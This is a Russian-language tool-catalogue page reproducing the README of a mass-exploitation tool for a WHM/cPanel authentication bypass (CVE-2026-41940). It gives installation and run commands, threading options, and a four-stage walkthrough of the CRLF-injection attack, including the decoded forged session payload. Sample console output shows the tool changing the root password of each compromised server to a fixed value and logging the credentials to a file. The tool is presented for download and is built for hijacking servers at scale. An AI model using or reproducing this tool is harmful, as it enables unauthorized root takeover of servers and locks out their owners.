Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — Массовый сканер и инструмент массовой эксплуатации для CVE-2026-41940 на cPanel/WHM, созданный для автоматической проверки целей и высокоскоростного многопоточного выполнения. | Kitploit
Инструменты/GitHubGitHub/jenderal92/cve-2026-41940
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и УправлениеАутентификацияRed TeamingРазработка Полезной Нагрузки
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

Массовый сканер и инструмент массовой эксплуатации для CVE-2026-41940 на cPanel/WHM, созданный для автоматической проверки целей и высокоскоростного многопоточного выполнения.

44264 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41940 - WHM/cPanel-массовый эксплойт обхода аутентификации

43153

📋 Описание

CVE-2026-41940 — это критическая уязвимость обхода аутентификации в WHM/cPanel, позволяющая злоумышленникам обойти аутентификацию и получить root-доступ к серверу без действительных учётных данных. Уязвимость использует CRLF-инъекцию в механизме управления сессиями для внедрения вредоносных параметров сессии.

Этот инструмент предоставляет возможности массовой эксплуатации с поддержкой многопоточности для одновременного тестирования нескольких целей, с интеллектуальным обнаружением успеха и автоматической фильтрацией недействительных целей.


🎯 Основные возможности

ВозможностьОписание
✅ Массовая эксплуатацияСканирование и эксплуатация нескольких целей из файла списка
🚀 МногопоточностьНастраиваемое количество потоков для более быстрого сканирования (по умолчанию: 15)
🔐 Автосмена пароляМеняет root-пароль на Jenderal92 при успешной эксплуатации
🛡️ Умное обнаружение успехаАвтоматически определяет различные форматы ответов WHM API
⚠️ Фильтрация ошибок лицензииИсключает цели с ошибками «недопустимая/невозможно прочитать лицензию»
📝 Структурированный выводСохраняет только подтверждённые успехи в формате domain:port|user|pass
🛡️ Поддержка SSL/TLSАвтоматическая обработка самоподписанных сертификатов
🔄 Управление сессиямиАвтоматическое извлечение сессии, внедрение cookie и обработка токенов
⏱️ Контроль таймаутаНастраиваемый таймаут соединения (по умолчанию: 15 секунд)
🔍 Проверка перед подключениемПроверка доступности порта перед попыткой эксплуатации
📊 Прогресс в реальном времениПоказывает подробный прогресс каждого этапа эксплуатации

📦 Требования

  • Python 2.7 (обязательно — НЕ совместим с Python 3.x)
  • Подключение к Интернету для доступа к целям
  • Требуемые пакеты Python:
pip install requests urllib3 futures

Или используйте requirements.txt:

requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 Установка

# Клонирование репозитория
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Установка зависимостей
pip install -r requirements.txt

# Сделать исполняемым (Linux/Mac)
chmod +x CVE-2026-41940.py

🚀 Использование

1. Подготовка файла целей

Создайте файл targets.txt с одной целью на строку:

https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

Примечание: Порт 2087 — порт WHM по умолчанию. Если не указан, автоматически будет использоваться порт 2087. Префикс HTTP/HTTPS будет добавлен автоматически, если отсутствует.

2. Запуск эксплойта

Базовое использование (настройки по умолчанию)

python2 CVE-2026-41940.py targets.txt

Многопоточное использование

# Использовать 5 одновременных потоков
python2 CVE-2026-41940.py targets.txt --threads 5

# Использовать 20 потоков для более быстрого сканирования
python2 CVE-2026-41940.py targets.txt --threads 20

Пользовательское имя хоста

# Переопределить заголовок Host для всех целей
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

Пользовательский таймаут

# Установить таймаут 30 секунд для медленных соединений
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 Аргументы командной строки

АргументОписаниеПо умолчаниюОбязательно
list_fileФайл, содержащий список целей (по одной на строку)-✅ Да
--threadsКоличество одновременных потоков15❌ Нет
--hostnameПереопределить заголовок Host для всех целейАвтоопределение❌ Нет
--timeoutТаймаут соединения в секундах15❌ Нет

📁 Формат вывода

Файл результатов (res.txt)

Сохраняются только подтверждённые успешные эксплойты. Цели с ошибками лицензии, неудачной сменой пароля или проблемами с соединением автоматически исключаются.

Формат:

domain:port|root|Jenderal92

Пример вывода:

www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

Исключённые сценарии

Следующие цели НЕ будут сохранены в res.txt:

  • Ошибки лицензии (Cannot Read License File)
  • Неудачная смена пароля
  • Таймауты или отказы соединения
  • Обновлённые/цели без WHM
  • Неверные учётные данные или сбои сессии

Вывод в консоли

$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!

[✓] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  ✓ 127.0.0.1:2087

🔬 Как работает эксплойт

Эксплойт состоит из 4 основных этапов с интеллектуальной проверкой:

Этап 1: Сессия предварительной аутентификации

[1] minting a preauth session...
  • Отправляет POST-запрос на /login/?login_only=1 с недействительными учётными данными
  • Извлекает cookie whostmgrsession из ответа сервера
  • Извлекает основу сессии, удаляя хвост ,<obhex>
  • Это даёт нам валидный формат сессии для работы

Этап 2: CRLF-инъекция

[2] sending the CRLF injection...
  • Отправляет GET-запрос с заголовком Authorization: Basic, содержащим вредоносную нагрузку
  • Нагрузка в Base64 декодируется в:
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • Символы CRLF (\r\n) внедряют поддельные параметры сессии
  • Это обманывает сервер, заставляя его думать, что аутентификация прошла успешно
  • Сервер отвечает HTTP 307 с заголовком Location, содержащим cp_security_token

Этап 3: Распространение сессии

[3] firing do_token_denied to propagate...
  • Обращается к конечной точке /scripts2/listaccts с манипулированным cookie
  • Запускает механизм do_token_denied в WHM
  • Это распространяет внедрённые параметры сессии в кеш сессий сервера
  • Ответ HTTP 401 с сообщением «Token denied» подтверждает успешное распространение
Скачать инструмент